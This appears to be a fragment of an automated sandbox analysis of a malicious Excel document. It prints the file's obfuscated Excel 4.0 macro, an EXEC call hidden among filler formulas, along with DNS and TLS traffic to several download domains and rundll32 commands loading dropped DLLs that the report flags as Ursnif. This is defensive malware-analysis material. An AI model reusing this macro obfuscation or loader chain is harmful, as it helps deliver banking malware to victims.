(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=EXEC(Doc2!CE2&Doc2!CE3&Doc2!CE4&Doc2!CE5&Doc2!CE6&Doc2!CE7&Doc2!CE8&""2 ""&before.2.198.0.sheet!E201&Doc2!CG2&Doc2!CG3&Doc2!CG4&Doc2!CG5&Doc2!CG6&Doc2!CG7&Doc2!CG8&Doc2!CG9&Doc2!CG10&Doc2!CG11&Doc2!CG12&Doc2!CG13&Doc2!CG14&Doc2!CG15&Doc2!CG16&Doc2!CG17&Doc2!CG18&Doc2!CG19)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)",,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452
478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(784254

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Apr 7, 2021 10:56:05.842475891 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842487097 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842521906 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842576981 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842624903 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.842719078 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.842757940 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.843050957 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.843111038 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989312887 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989336014 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989348888 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989361048 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989372969 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989398003 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989466906 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989484072 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989485979 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989499092 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989502907 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989506960 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989509106 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989511967 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989515066 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989542007 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989546061 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989577055 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989598989 CEST44349168162.241.62.4192.168.2.22
                                                                        Apr 7, 2021 10:56:05.989687920 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989701986 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:05.989705086 CEST49168443192.168.2.22162.241.62.4
                                                                        Apr 7, 2021 10:56:06.040070057 CEST49170443192.168.2.22192.185.129.4
                                                                        Apr 7, 2021 10:56:06.182881117 CEST44349170192.185.129.4192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 7, 2021 10:56:01.397912025 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:01.566401005 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:02.648638010 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:02.668864965 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:02.681109905 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:02.727189064 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:03.847851038 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:04.030041933 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:04.644742966 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:04.656749010 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:04.664242983 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:04.676858902 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:05.858853102 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:06.035976887 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:07.362716913 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:07.426685095 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Apr 7, 2021 10:56:07.901401043 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Apr 7, 2021 10:56:08.045149088 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 7, 2021 10:56:01.397912025 CEST | 192.168.2.22 | 8.8.8.8 | 0x2c09 | Standard query (0) | vts.us.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:03.847851038 CEST | 192.168.2.22 | 8.8.8.8 | 0x82b3 | Standard query (0) | mundotecnologiasolar.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:05.858853102 CEST | 192.168.2.22 | 8.8.8.8 | 0xdfb5 | Standard query (0) | accesslinksgroup.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:07.362716913 CEST | 192.168.2.22 | 8.8.8.8 | 0xfa91 | Standard query (0) | ponchokhana.com | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:07.901401043 CEST | 192.168.2.22 | 8.8.8.8 | 0x1e93 | Standard query (0) | comosairdoburaco.com.br | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 7, 2021 10:56:01.566401005 CEST | 8.8.8.8 | 192.168.2.22 | 0x2c09 | No error (0) | vts.us.com | (none) | 207.174.213.126 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:04.030041933 CEST | 8.8.8.8 | 192.168.2.22 | 0x82b3 | No error (0) | mundotecnologiasolar.com | (none) | 162.241.62.4 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:06.035976887 CEST | 8.8.8.8 | 192.168.2.22 | 0xdfb5 | No error (0) | accesslinksgroup.com | (none) | 192.185.129.4 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:07.426685095 CEST | 8.8.8.8 | 192.168.2.22 | 0xfa91 | No error (0) | ponchokhana.com | (none) | 5.100.155.169 | A (IP address) | IN (0x0001)
Apr 7, 2021 10:56:08.045149088 CEST | 8.8.8.8 | 192.168.2.22 | 0x1e93 | No error (0) | comosairdoburaco.com.br | (none) | 198.50.218.68 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 7, 2021 10:56:01.884533882 CEST | 207.174.213.126 | 443 | 192.168.2.22 | 49165 | CN=vts.us.com | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Aug 26 02:00:00 CEST 2020 | Fri Aug 27 01:59:59 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
  (chain) | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031
  (chain) | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029
Apr 7, 2021 10:56:04.325406075 CEST | 162.241.62.4 | 443 | 192.168.2.22 | 49168 | CN=mail.mundotecnologiasolar.com | CN=R3, O=Let's Encrypt, C=US | Wed Mar 17 19:57:39 CET 2021 | Tue Jun 15 20:57:39 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
  (chain) | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Apr 7, 2021 10:56:06.333168030 CEST | 192.185.129.4 | 443 | 192.168.2.22 | 49170 | CN=webmail.accesslinksgroup.com | CN=R3, O=Let's Encrypt, C=US | Fri Feb 12 14:32:48 CET 2021 | Thu May 13 15:32:48 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
  (chain) | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Apr 7, 2021 10:56:07.525214911 CEST | 5.100.155.169 | 443 | 192.168.2.22 | 49171 | CN=mail.ponchokhana.com | CN=R3, O=Let's Encrypt, C=US | Wed Mar 03 22:31:59 CET 2021 | Tue Jun 01 23:31:59 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
  (chain) | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Apr 7, 2021 10:56:08.283134937 CEST | 198.50.218.68 | 443 | 192.168.2.22 | 49173 | CN=comosairdoburaco.com.br | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Sun Mar 14 01:00:00 CET 2021 | Sun Jun 13 01:59:59 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b
  (chain) | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
  (chain) | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        System Behavior

                                                                        General

Start time: 10:55:35
Start date: 07/04/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fe40000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        General

Start time: 10:55:45
Start date: 07/04/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\fikftkm.thj,DllRegisterServer
Imagebase: 0xffc20000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        General

Start time: 10:55:46
Start date: 07/04/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\fikftkm.thj1,DllRegisterServer
Imagebase: 0xffc20000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        General

Start time: 10:55:46
Start date: 07/04/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\fikftkm.thj2,DllRegisterServer
Imagebase: 0xffc20000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        General

Start time: 10:55:46
Start date: 07/04/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\fikftkm.thj2,DllRegisterServer
Imagebase: 0x630000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                        General

Start time: 10:56:17
Start date: 07/04/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\fikftkm.thj3,DllRegisterServer
Imagebase: 0xffc20000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        General

Start time: 10:56:17
Start date: 07/04/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\fikftkm.thj4,DllRegisterServer
Imagebase: 0xffc20000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                        Disassembly

                                                                        Code Analysis